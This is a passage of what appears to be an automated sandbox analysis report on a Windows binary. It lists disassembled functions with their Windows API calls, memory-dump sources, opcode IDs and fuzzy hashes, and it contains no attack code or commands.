                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 0ef69c583bf81294d94cac9bdf5e2fa2c42a6c7baa5426f1356095ce90fe2c6d
                                                  • Instruction ID: 1d378851904ebff62fa4858380ed4574527cf483bd8900a916d6d900277faaf0
                                                  • Opcode Fuzzy Hash: 0ef69c583bf81294d94cac9bdf5e2fa2c42a6c7baa5426f1356095ce90fe2c6d
                                                  • Instruction Fuzzy Hash: 29218175600329ABDB209F29EC04B9E77E4FF45720F204A29FDA1D76D0D77099519B60
                                                  Function 00C26E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C26E89
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C26EBB
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C26ECC
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C26F06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 389fb7623689e4acaccec4afe3a26e7bbe4f15557f31a820a8143abff81e0386
                                                  • Instruction ID: 999c21f57d0a21681d06890cc64f510d64f3a4ecb2b004770e9ec8d42202e4d0
                                                  • Opcode Fuzzy Hash: 389fb7623689e4acaccec4afe3a26e7bbe4f15557f31a820a8143abff81e0386
                                                  • Instruction Fuzzy Hash: 64216D796003259BDB20AF69EC04BAE77A8AF55730F200A19FDB1D76D0DB70A951CB70
                                                  Function 00C2AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2AC54
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C2ACA8
                                                  • __swprintf.LIBCMT ref: 00C2ACC1
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C4F910), ref: 00C2ACFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 14b69337d34c02520dfc28ea2f2205a6ea9d87fb0d9ca2232abd17f080120a48
                                                  • Instruction ID: 86760e02b9e4bfaac17a9867a14e5a223e57d3ee51bd820c1cee3fd036e9fb61
                                                  • Opcode Fuzzy Hash: 14b69337d34c02520dfc28ea2f2205a6ea9d87fb0d9ca2232abd17f080120a48
                                                  • Instruction Fuzzy Hash: 5721AF35A00109AFCB10EF65DD45EAE7BF8FF89714B0040A9F909EB251DB71EA41CB21
                                                  Function 00C21AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C21B19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: e030851d2050f5b8cfd75b2f359113326fe989364957e3cdabcde84ca266fba8
                                                  • Instruction ID: 7359309bd2d0637573b452b7249d20843ca7b6c0764d4fa58bd8a053aa0aa8a0
                                                  • Opcode Fuzzy Hash: e030851d2050f5b8cfd75b2f359113326fe989364957e3cdabcde84ca266fba8
                                                  • Instruction Fuzzy Hash: 4211A1B09501988FCF00EF94D8519FEB3F4FF35304B1484A8D82867A91EB329D4ACB50
                                                  Function 00C3EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3EC07
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3EC37
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C3ED6A
                                                  • CloseHandle.KERNEL32(?), ref: 00C3EDEB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: d80fd0c384fb7075f815126c0e8962c5a06d1e09f65a3af1aa07ff7369986736
                                                  • Instruction ID: 9f191ad0c2081d94f5bdfbf76e97f5a08bf909292de9914f77847acd8a3e7463
                                                  • Opcode Fuzzy Hash: d80fd0c384fb7075f815126c0e8962c5a06d1e09f65a3af1aa07ff7369986736
                                                  • Instruction Fuzzy Hash: DC8173716043009FE720EF28C886F6AB7E5AF84750F14885DF9AADB2D2DB70AD41CB51
                                                  Function 00BE541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                  • Instruction ID: fe6d62527636b5927ff826c23633fb4a60383f690e6c254b26aba98627c5543d
                                                  • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                  • Instruction Fuzzy Hash: CB51C370A00B85DBCB349FABD88066E77F6EF50329F2487A9F825962D5D770DD908B40
                                                  Function 00C40037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C400FD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C4013C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C40183
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00C401AF
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C401BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 525d96aedae2f7328c8ff80a8f8b1a1b05d42e9591f3cd66edf1dab37508a23d
                                                  • Instruction ID: 52bf0eac1ae0536dab6f38511bb8ed1ee05d36956438a37d2ae1e5ec9f8e51d3
                                                  • Opcode Fuzzy Hash: 525d96aedae2f7328c8ff80a8f8b1a1b05d42e9591f3cd66edf1dab37508a23d
                                                  • Instruction Fuzzy Hash: 3C516731208204AFD714EF68C881F6EB7E9FF88314F10496DF5968B2A2DB31E945DB52
                                                  Function 00C3D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3D927
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C3D9AA
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C3D9C6
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C3DA07
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3DA21
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: ea9307ea008f67c763fd56349537a4cb2d4e249f5af2d1332dd5c34ff51023f1
                                                  • Instruction ID: db7ddd10840b83c5746764739d2913438c8fa23a6cb9aaabfe95dfa7f9de4571
                                                  • Opcode Fuzzy Hash: ea9307ea008f67c763fd56349537a4cb2d4e249f5af2d1332dd5c34ff51023f1
                                                  • Instruction Fuzzy Hash: 8C51E775A00209DFDB10EFA8D484EADB7F5FF09320B1480A9E856AB312DB31AE45CB51
                                                  Function 00C2E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C2E61F
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C2E648
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C2E687
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C2E6AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C2E6B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: d82136f75580ef190b697a67f4886001b5f6dfeb1b186833e53a54b0578793df
                                                  • Instruction ID: d65cc500a44909e683d5f3fb088cb00b38d310edcf4c01caef1ea7b436118069
                                                  • Opcode Fuzzy Hash: d82136f75580ef190b697a67f4886001b5f6dfeb1b186833e53a54b0578793df
                                                  • Instruction Fuzzy Hash: C8511835A00209DFDB01EF65C985EAEBBF5FF09314B1480A9E819AB362CB31ED51DB50
                                                  Function 00C4A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31a25c00c7769dc2b063a89a2833b124b68611d3064af14c5e36bff36d7be24b
                                                  • Instruction ID: e488565935bd449ffd75a6d8425ec5cf653b82cbe993c950f261f1d45a8d9003
                                                  • Opcode Fuzzy Hash: 31a25c00c7769dc2b063a89a2833b124b68611d3064af14c5e36bff36d7be24b
                                                  • Instruction Fuzzy Hash: 9D41A379984114EFD724DF28CC48FADBBB8FB09320F154169F926A72E1C770AE41DA51
                                                  Function 00C163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C163E7
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C16433
                                                  • TranslateMessage.USER32(?), ref: 00C1645C
                                                  • DispatchMessageW.USER32(?), ref: 00C16466
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C16475
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 124c2f9dabfe0db628ebe751e2f51b1dac0ce393c1c2764ebe1f08450b69fe6f
                                                  • Instruction ID: 34b39861acc8e1fa2ebb7b53969250caf739c867aa6a1ee1125c2763a873704a
                                                  • Opcode Fuzzy Hash: 124c2f9dabfe0db628ebe751e2f51b1dac0ce393c1c2764ebe1f08450b69fe6f
                                                  • Instruction Fuzzy Hash: AC31C131940656AFDB24CFB4DC44BFA7BACAB02304F54416AE431C31A0EB7599C9EBA4
                                                  Function 00C18A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C18A30
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00C18ADA
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C18AE2
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00C18AF0
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C18AF8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
                                                  • Instruction ID: de8de30fbe02a7d292dc897c0fda9591326326a86c379a9da94f542678ff9138
                                                  • Opcode Fuzzy Hash: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
                                                  • Instruction Fuzzy Hash: 6731B171904219EBDB14CF68D94CBDE3BB5FF06315F108229F925E61D0C7B09A54EB90
                                                  Function 00C1B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C1B204
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C1B221
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C1B259
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C1B27F
                                                  • _wcsstr.LIBCMT ref: 00C1B289
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 8f536c2af9b5fa66da71b61abe5d5dbbbebe7f9e856c22421762d4f8ad6c529d
                                                  • Instruction ID: db7e908b5ed8e5adc80b5fb4f647c46fadf33c37ab943fab71812b375c024fb9
                                                  • Opcode Fuzzy Hash: 8f536c2af9b5fa66da71b61abe5d5dbbbebe7f9e856c22421762d4f8ad6c529d
                                                  • Instruction Fuzzy Hash: 192128316042407AEB155B369C09FBF7B98DF4A750F01407DF804CA161EB718D81AA60
                                                  Function 00C4B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4B192
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C4B1B7
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C4B1CF
                                                  • GetSystemMetrics.USER32(00000004), ref: 00C4B1F8
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C30E90,00000000), ref: 00C4B216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: a1d885e1738568357f8c686dcb822827a958ed1b4326570e29f00eb16ddcc9b3
                                                  • Instruction ID: 4010dd86a50e47daf6c6919394036358911e2e15a1d444ce6f78270b151c9499
                                                  • Opcode Fuzzy Hash: a1d885e1738568357f8c686dcb822827a958ed1b4326570e29f00eb16ddcc9b3
                                                  • Instruction Fuzzy Hash: FE218B71A10661AFCB209F399C04B6E3BA4FB06321F114B29B932D71E0E770DD219B90
                                                  Function 00C19307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C19320
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19352
                                                  • __itow.LIBCMT ref: 00C1936A
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19392
                                                  • __itow.LIBCMT ref: 00C193A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 82eaa2bd0084a409c23f2061f8ec90189a7393fc21e4359052a8812e1e9ff3d3
                                                  • Instruction ID: 4479ed2db6b732e155fb0a2516c3ef5a238773a2fb97de06a285326d8fd89200
                                                  • Opcode Fuzzy Hash: 82eaa2bd0084a409c23f2061f8ec90189a7393fc21e4359052a8812e1e9ff3d3
                                                  • Instruction Fuzzy Hash: 65210735701208BBDB109A658C99FEE7BF8EF4A720F444069F954D72E0DAB0CE81A791
                                                  Function 00C35A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00C35A6E
                                                  • GetForegroundWindow.USER32 ref: 00C35A85
                                                  • GetDC.USER32(00000000), ref: 00C35AC1
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00C35ACD
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00C35B08
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
